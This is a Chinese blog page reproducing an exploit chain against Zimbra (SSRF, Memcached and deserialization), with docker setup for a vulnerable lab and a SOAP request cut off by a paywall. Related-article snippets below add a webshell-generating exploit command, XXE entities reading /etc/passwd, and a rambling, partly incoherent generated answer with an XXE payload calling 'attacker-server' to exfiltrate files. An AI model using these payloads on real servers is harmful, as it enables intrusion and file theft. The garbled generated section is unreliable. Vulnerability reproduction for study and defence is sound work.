Zimbra SSRF+Memcached+反序列化漏洞利用复现

最新推荐文章于 2025-08-07 18:25:05 发布
最新推荐文章于 2025-08-07 18:25:05 发布
阅读量8.9k 收藏
点赞数 4
CC 4.0 BY-SA版权
分类专栏: Java 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fnmsd/article/details/89235589

前言

之前懒了一下,没复现memcached反序列化的部分。

在看本文之前请先看完上一篇复现:
https://blog.youkuaiyun.com/fnmsd/article/details/88657083

本篇复现基于8.7.11进行复现,就是官网上直接下的。

纯技术研究,请勿使用在非法用途。

环境搭建

直接用docker,https://hub.docker.com/r/jorgedlcruz/zimbra
虚拟机中使用,请给4G以上内存。

docker pull jorgedlcruz/zimbra
docker run -p 25:25 -p 80:80 -p 465:465 -p 587:587 -p 110:110 -p 143:143 -p 993:993 -p 995:995 -p 443:443 -p 8080:8080 -p 8443:8443 -p 7071:7071 -p 9071:9071 -h zimbra-docker.zimbra.io --dns 127.0.0.1 --dns 8.8.8.8 -i -t -e PASSWORD=Zimbra2017 jorgedlcruz/zimbra

如果过程失败就exec到启动的Container里执行:

cd /opt/zimbra-install/zcs-* && ./install.sh -s < /opt/zimbra-install/installZimbra-keystrokes

,基本都是网络问题,重执行几次就好了。安装成功后,再执行如下命令:

/opt/zimbra/libexec/zmsetup.pl -c /opt/zimbra-install/installZimbraScript
su - zimbra -c 'zmcontrol restart'

具体安装过程看docker中的/opt/start.sh

题外话:其实端口不映射出来也没问题,直接访问相应的docker ip就好(172.17.0.2之类的)

获取普通用户

由于memcached的反序列化与邮箱账户有关,此处我们需要一个普通的邮箱。

方法一:通过Admin接口创建用户

依然是通过Proxy走admin soap接口,name需要是个邮箱地址,password6位以上

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name
最低0.47元/天 解锁文章

200万优质内容无限畅学
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
4SecNet团队专栏
04-19 6597
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的邮箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
Zimbra CVE-2019-9670 XXE + CVE-2019-9621 SSRF 漏洞复现
部分学习记录
03-12 3393
炒冷饭复现:cve-2019-9670 xxe + cve-2019-9621 ssrf
zimbra rce 漏洞复现
weixin_40709439的博客
05-12 7546
本地搭建了好久,虚拟机突然蹦了,。。。 上钟馗之眼和shodan找了个目标 第一步,利用了CVE-2019-9670 XXE漏洞来读取配置文件 Zimbra配置文件位置为/conf/localconfig.xml 根据《A Saga of Code Executions on Zimbra》RCE漏洞分析 https://blog.youkuaiyun.com/fnmsd/article/details/88...
Zimbra漏洞复现
最新发布
Ryana2的博客
08-07 1101
3.生成含有木马的.jsp文件,命名为MM.jsp,语句为:python3 zimbra.py -u https://192.168.42.131 -d http://192.168.42.128:8686/exp.dtd -n Hh -f MM.jsp。扫描该站点目录:dirsearch -u https://192.168.42.131 ,看看有什么有用的信息,发现没什么有用信息。2.将抓到的包放入Repeater,并修改包内容,发现内容通过XXE漏洞被读出。尝试利用CVE-2019-9670漏洞
CVE-2022-27925 Zimbra任意文件上传漏洞复现
热爱学习,喜欢折腾!
10-26 6201
Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。它最大的特色在于其采用Ajax技术模仿CS桌面应用软件的风格开发的客户端兼容Firefox,Safari和IE浏览器。Zimbra Collaboration(又称ZCS)8.8.15和9.0具有mboximport功能,可接收ZIP存档并从中提取文件,具有管理员权限的认证用户可以将任意文件上传到系统中,从而导致目录遍历或远程代码执行。
关于zimbra复现以及突破
weixin_30721077的博客
04-20 972
Zimbra未登录RCE漏洞利用 首先我是根据这个PDF进行复现的,但是复现过程出现很多问题 首先使用这个XXE读取文件 <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <Autodiscover xmlns="http://sc...
zimbra_poc:Zimbra XXE + SSRF + UPC Poc
03-16
Zimbra POC 用法 需要自己在源代码中修改dtd_url为如下内容的dtd地址: <!ENTITY % file SYSTEM "file:../conf/localconfig.xml"> <!ENTITY % start " <![CDATA[ "> <!ENTITY % end " ]]> "> <!...
Zimbra邮件服务器利用XXE漏洞SSRF完成对目标的文件上传与远程代码执行
勤能补拙
04-06 7396
前言 原文地址:https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html 参考文档:https://blog.youkuaiyun.com/fnmsd/article/details/88657083 历史版本存在的RCE(远程代码执行)漏洞: CVE-2013-7091本地文件披露漏洞,影响范围为8.0.2以下版本...
zimbra邮箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra邮箱服务器的用户口令在线爆破。
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
include_voidmain的博客
07-07 3473
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
docker-zimbra:提供 Zimbra 协作套件的 Docker 映像
05-31
使用 Zimbra 8.8.15 GA(FOSS 版)的 Docker 映像 概述 此映像包含下载、设置和运行协作套件所需的一切。 图像本身不包含 Zimbra。 在第一次启动时,容器会在 docker 卷上安装一个简约的 Ubuntu 18.04 LTS。 此安装用作 Zimbra 的根文件系统,因此 Zimbra 可以与环境一起工作,并且一切都保持一致和持久 - 即使容器已更新。 这也意味着拉取新镜像版本不会自动更新 docker 卷上的 Ubuntu 安装。 为了减少出现安全问题的机会,容器配置了 Ubuntu 的无人值守升级包来自动安装官方更新。 容器支持具有全局 IPv6 地址的 IPv6,并配置包过滤以阻止常见攻击和对非公共端口的访问。 用法 关于如何在Docker主机或Kubernetes上部署 Zimbra 容器的使用场景可以在找到。 维护 如果卷为空,容器会在附加卷上安
zimbra memcache遭***
weixin_33841722的博客
02-28 243
接到同事通知 主机无法登陆和网络的同事产看后发现流量徒增,由于交换机限速100m,造成服务异常,报警不断。暂时先放开限速后 发现zimbra服务器出流量过高1G,登陆主机后发现是memcache端口11211产生的流量在memcache中写入一个比较大的value,当请求此value的时候memcache就会往外吐…… 用伪造的udp包进行请求,反弹***的目的就达到了,当时...
php+memcache+漏洞,Discuz memcache+ssrf GETSHELL漏洞
weixin_34363071的博客
03-28 322
Discuz存在SSRF漏洞,在配置了memcache的情况下,攻击者可以利用ssrf通过memcache中转,向磁盘上写入WEBSHELL恶意代码,从而造成数据库泄漏。任何的外部输入,包括memcache缓存都应该认为不可信,建议在任何从外部输入的数据都进行必要的转义和过滤,可禁用preg_replace /e代码执行。修改文件:/source/function/function_core.ph...
Discuz memcache+ssrf GETSHELL漏洞的问题
发粪涂墙的小毛驴的博客
07-01 2520
这2天,很多站长肯定都收到阿里云提示discuz memcache+ssrf GETSHELL漏洞的相关说明,但购买阿里云云盾安骑士最少需要支付100块钱,下面我就在猪先飞网给大家分享下如何来解决Discuz memcache+ssrf GETSHELL漏洞的问题。 该漏洞描述:discuz存在SSRF漏洞,在配置了memcache的情况下,攻击者可以利用ssrf通过memcache中转,向磁盘
Didcuz memcache+ssrf GETSHELL漏洞
G00dChina的博客
06-08 1595
漏动来源:阿里云云盾 漏动名称:Didcuz memcache+ssrf GETSHELL漏洞 漏动描述:Discuz存在SSRF漏洞,在配置了memcache的情况下,攻击者可以利用ssrf通过memcache中转,向磁盘上写入WEBSHELL恶意代码,从而造成数据库泄漏; 漏动文件:bbs/src/source/function/function_core.php
Didcuz memcache+ssrf GETSHELL漏洞解决方法
风达的专栏
06-09 7317
漏动来源:阿里云云盾 漏动名称:Didcuz memcache+ssrf GETSHELL漏洞 漏动描述:Discuz存在SSRF漏洞,在配置了memcache的情况下,攻击者可以利用ssrf通过memcache中转,向磁盘上写入WEBSHELL恶意代码,从而造成数据库泄漏; 漏动文件:/source/function/function_core.php 修复方法:
反序列化利用工具_MozillaRhino反序列化利用
weixin_27051161的博客
01-27 832
标题: MozillaRhino反序列化利用链☆前言☆Serializable接口详解10)MozillaRhino反序列化漏洞10.1)org.mozilla.javascript.NativeError10.1.0)JacksonExploit.java10.1.1)NativeErrorExec.java...
zimbra邮件服务器部署
weixin_34238633的博客
02-06 422
  1. 硬件需求 CPU: Intel / AMD CPU 2.4GHz     数量: 1 内存: 4G                           数量:2 x 2G 或者 1 x 4G      官方给出的最低需求: Intel / AMD CPU 1.5GHz            数量: 1 1G RAM(服务器运行时耗掉九百多兆,空闲内存接近0) 硬盘:3 x...
xxe漏洞复现ssrf
03-27
### XXE漏洞SSRF的关系 XXE(XML External Entity)漏洞允许攻击者通过恶意构造的外部实体引用,读取服务器上的文件或其他资源。而SSRF(Server-Side Request Forgery)是一种让目标服务器发起请求到指定地址的安全问题。两者可以通过特定方式结合使用,在某些场景下实现更复杂的攻击效果。 例如,XXE可以和SSRF一起用于探测其他内网主机的信息,基于HTTP协议进行端口扫描或服务发现[^1]。这种组合能够使攻击范围扩大至内部网络中的更多资产。 --- ### Zimbra RCE漏洞背景及其利用关系 在一些复杂的应用程序中,多个安全缺陷可能相互关联形成更大的威胁模型。比如Zimbra远程代码执行漏洞(CVE-2019-9670),其完整的RCE链依赖于另一个SSRF漏洞(CVE-2019-9621)[^2]。尽管官方文档提到需要两个漏洞配合才能达成最终的目标——即完全控制受害者的机器;但实际上也有方法绕过此限制单独触发该功能模块从而直接获得shell权限的情况发生(具体细节未公开披露)。 这表明即使缺少明确标注出来的辅助条件也可能找到替代路径去完成整个攻击链条的设计意图之外的操作行为模式转换过程中的可能性探索方向之一就是寻找是否存在类似的逻辑错误或者配置不当之处作为突破口来进行尝试突破现有的防护机制进而达到预期目的的同时还应该考虑到实际环境中可能会遇到的各种阻碍因素影响最终成功率高低程度不同而已。 --- ### 复现步骤概述 为了验证上述理论假设成立与否并通过实践检验得出结论证明观点正确无误的话,则需按照如下方式进行操作: #### 准备工作 1. **环境搭建**: 使用虚拟机创建隔离测试环境,安装易受攻击版本的服务软件实例。 2. **工具准备**: 下载并启动Burp Suite社区版用作中间拦截器角色以便后续手动调整数据包内容后再转发出去供进一步分析研究之用。 #### 实际演练部分 ##### 设置代理连接 在浏览器里设定好相应的出口通道指向本地监听端口号之后加载含有潜在风险点位链接地址页面时自动将所有通信流量导向我们事先布置好的陷阱装置等待捕捉感兴趣的数据片段回来审查是否有异常现象出现值得深入挖掘下去的价值所在之处存在即可视为成功捕获有效样本素材可供下一步骤处理使用前先保存原始状态副本留档备案以防万一丢失重要线索证据材料造成无法挽回的局面后果严重必须谨慎对待每一个环节都不能马虎大意才行啊同志们加油干吧! ```plaintext GET /vuln/xxetest.php HTTP/1.1 Host: target-site.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` ##### 构造Payload 接着把刚才截获下来的未经修改过的原样复制粘贴过来放到重复发送窗口里面替换掉原有的参数字段值换成精心设计制作而成的新颖独特而又充满危险性的特殊字符序列结构形式表现出来看看会发生什么有趣的事情呢?让我们拭目以待吧朋友们! ```xml <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test[ <!ENTITY % remote SYSTEM "http://attacker-server/payload.dtd"> <!ENTITY % init "<!ENTITY % send SYSTEM 'file:///etc/passwd'>"> ]> <reset> <login>admin;%send;</login> <secret>Any bugs?</secret> </reset> ``` 注意这里引入了一个外部DTD定义文件`payload.dtd`,它包含了更多的指令用来指示解析引擎如何去构建新的实体标签嵌套层次关系直到最后一步才真正暴露核心秘密武器位置信息泄露给外界观察员看到为止才算圆满完成任务使命结束啦哈哈哈哈哈!!! --- ### 结果评估标准说明 当以上所有的准备工作都顺利完成以后就可以静候佳音传来好消息咯~ 如果一切正常顺利的话那么你应该能够在自己的监控屏幕上清晰地看见来自受害者那边传来的回应消息当中携带了原本不应该被轻易获取得到的秘密情报资料比如说操作系统用户名列表之类的敏感隐私类别的东西就充分证明我们的实验取得了圆满的成功成果喜人呀各位小伙伴们快来庆祝一番吧😊🎉👏 当然啦除了单纯追求技术层面的乐趣体验之外更重要的是要从中吸取教训总结经验不断提高自身的网络安全意识水平时刻保持警惕防止自己成为下一个倒霉蛋哦记住一句话叫做“道高一尺魔高一丈”永远不要低估敌人可能拥有的强大实力好吗谢谢大家听我说完这些话希望对你们有所帮助再见👋~ ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值